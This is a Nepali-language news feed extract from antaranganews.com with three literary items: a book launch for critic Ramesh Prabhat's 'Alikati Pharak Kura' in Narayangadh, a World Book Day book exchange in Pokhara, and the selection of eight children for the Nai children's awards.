समीक्षक रमेश प्रभातको ‘अलिकति फरक कुरा’ सार्वजनिक https://www.antaranganews.com/?p=23842 https://www.antaranganews.com/?p=23842#respond Thu, 25 Apr 2024 16:00:08 +0000 https://www.antaranganews.com/?p=23842 चितवन, वैशाख १३ गते । आज २०८१ वैशाख १३ गते सम्पूर्ण किताब नारायणगढमा समीक्षक रमेश प्रभातको निसमालोचना कृति ‘अलिकति फरक कुरा’को घुम्टो उघार्ने काम सम्पन्न भएको छ । समीक्षक रमेश प्रभात, प्रकाशक रेखा श्रेष्ठ, कवि प्रकाश चापागाईं, कवि तथा आख्यानकार एल् बी क्षेत्री, अन्वेषक कर्ण बानियाँ तथा कवि एवम् निबन्धकार सृजन लम्सालले संयुक्त रूपमा घुम्टो उघारेका थिए ।

विमोचित कृतिका बारेमा सरोज दवाडीले समीक्षात्मक टिप्पणी प्रस्तुत गरेका थिए । उनले यस कृतिमा प्रयोग भएको भाषा र शैलीको प्रशंसा गरेका थिए । त्यस्तै कवि सुरेन्द्र अस्तफलले कृतिका बारेमा पाठकीय टिप्पणी गरेका थिए । एल् बी क्षेत्रीले यो कृति समीक्षा हो कि समालोचना भन्ने प्रश्न उठाएका थिए ।

उक्त कार्यक्रममा समालोचक एकनारायण पौडेलले निसमालोचना के हो ? समालोचना र निसमालोचनाको अन्तर के हो ? भन्ने कुरामा प्रकाश पार्दै उक्त कृतिका बारेमा छोटो टिप्पणी गरेका थिए ।

प्रमुख अतिथिको भूमिकामा रहेका कवि प्रकाश चापागाईंले  आफू कवि भएको कुरा गर्दै समालोचनामा त्यति रुचि नभएको कुरा गरे । कृतिकार रमेश प्रभातले आजको समालोचना पाठकमैत्री नभएको हुनाले निसमालोचना लेख्नुपरेको कुरा गरे । यसमा सिर्जनाको सुवास हुने कुरा पनि प्रस्ट पारे ।

सम्पूर्ण किताब नारायणगढले आयोजना गरेको उक्त कार्यक्रमको सभापतित्व कवि एवम् निबन्धकार सृजन लम्सालले गरेका थिए भने सहजीकरण लेखराम सापकोटाले गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23842 0
र्‍यान्डम रिडर्स सोसाइटीद्वारा पुस्तक साटासाट गरी मनाइयो पुस्तक दिवस https://www.antaranganews.com/?p=23830 https://www.antaranganews.com/?p=23830#respond Wed, 24 Apr 2024 14:36:43 +0000 https://www.antaranganews.com/?p=23830 पोखरा, वैशाख १२ गते । र्‍यान्डम रिडर्स सोसाइटीले विश्व पुस्तक तथा प्रतिलिपि अधिकार दिवसका अवसरमा पुस्तक आदानप्रदान कार्यक्रम सम्पन्न गरेको छ ।
सोसाइटीका अध्यक्ष रुपिन्द्र प्रभावीको अध्यक्षतामा भएको कार्यक्रममा नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका पूर्व कुलपति सरुभक्तले पुस्तकका माध्यमबाट जीवन बुझ्न सघाउ पुग्ने धारणा राखे । युनेस्कोले मानव जातिको आवश्यकतालाई महसुस गरी विभिन्न दिवसहरूको घोषणा गर्ने क्रममा स्थापित पुस्तक दिवस निकै महत्वपूर्ण भएको बताए । पुस्तक दिवसले पठन संस्कृतिको विकासमा विशेष भूमिका खेलेको उनको भनाइ थियो । कतिपयले पुस्तक देख्न नपाएका र देख्न पाए पनि पढ्न नपाएका व्यक्तिहरू आज पनि विश्वमा रहेको प्रसङ्ग कोट्याउँदै सरुभक्तले पढ्न बाँकी विश्वका मानिसले पनि पुस्तक पढन् पाउन् भन्ने कामना गरे ।
सचिव नेपालप्रकाश अधिकारीको सञ्चालनमा भएको कार्यक्रममा उपस्थित करिब ५० जनाले एकापसमा पुस्तक साटासाट गरेर पुस्तक दिवस मनाएका थिए । सोसाइटी हरेक वर्ष २३ अप्रिलमा पुस्तक दिवसमा पुस्तक आदानप्रदानसँगै विविध कार्यक्रम सञ्चालन गर्दै आएको छ ।
सोही अवसरमा सोसाइटीले साहित्यकार प्रकट पगेनी ‘शिव’ को स्मृतिमा श्रद्धाञ्जली सभा पनि सम्पन्न गरेको थियो । उनकै शोकमा सोसाइटीले वैशाख महिनाको नियमित कार्यक्रम स्थगित गरेको जानकारी सो अवसरमा दिइएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23830 0
‘नइ बाल पुरस्कार’का लागि आठ जना बालबालिका छनौट https://www.antaranganews.com/?p=22953 https://www.antaranganews.com/?p=22953#respond Tue, 05 Mar 2024 23:13:27 +0000 https://www.antaranganews.com/?p=22953 काठमाडौं– ‘नइ बाल पुरस्कार’बाट आठ जना बालबालिका छनौट भएका छन् । नइ प्रकाशनले आ–आफ्नो ठाउँबाट प्रतिष्ठा आर्जन गर्ने आठ जना बालबालिकालाई २०७९ सालको ‘नइ देरुनीखपू बाल पुरस्कार’ समर्पण गर्ने निर्णय गरेको छ । ४ वर्षदेखि १५ वर्षसम्म उमेरका बालबालिकाहरूको छनौट फागुन २२ गते गरिएको हो ।
‘नइ देरुनीखपू बाल पुरस्कार’बाट पुरस्कृत हुनेहरूमा बहुआयामिकतर्फ आयुषा लम्साल, साहित्यतर्फ कुञ्जल शुभेच्छु लुइँटेल, चित्रकलातर्फ रेजिना बोहोरा, सङ्गीततर्फ ईशा प्रजापति, नृत्यतर्फ कृष्मा ढुङ्गाना, खेलकुदतर्फ आहाना कार्की छन् । सो पुरस्कारको राशि ताम्रपत्रसहित जनही दस हजार रूपैयाँ रहेको छ ।
सो पुरस्कारबाट सम्मानित हुने अन्यमा नृत्यतर्फ नइ कोपिला पुरस्कार ऋषिका घिमिरे र नइ चिचिला पुरस्कार श्रेस्मी दाहाललाई समर्पण गर्ने निर्णय भएको नइ प्रकाशनका सदस्यसचिव नरेन्द्रराज प्रसाईले बताउनु भएको छ । उहाँका अनुसार यी पुरस्कारका राशि क्रमशः ताम्रपत्रसहित सात हजार र पाँच हजार रूपैयाँ रहेका छन् ।
प्रसाईले भन्नुभयो, ‘नइ प्रकाशनका कुलपति इन्दिरा प्रसाईको अध्यक्षतामा बसेको नइ प्रकाशनको बैठकले सो निर्णय गरेको हो ।’
२०७९ सालका सम्पूर्ण नइ पुरस्कारहरू आगामी चैत ३० गते काठमाडौंमा समर्पण गरिने कार्यक्रम रहेको नइ प्रकाशनका सदस्यसचिव नरेन्द्रराज प्रसाईले जानकारी दिनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=22953 0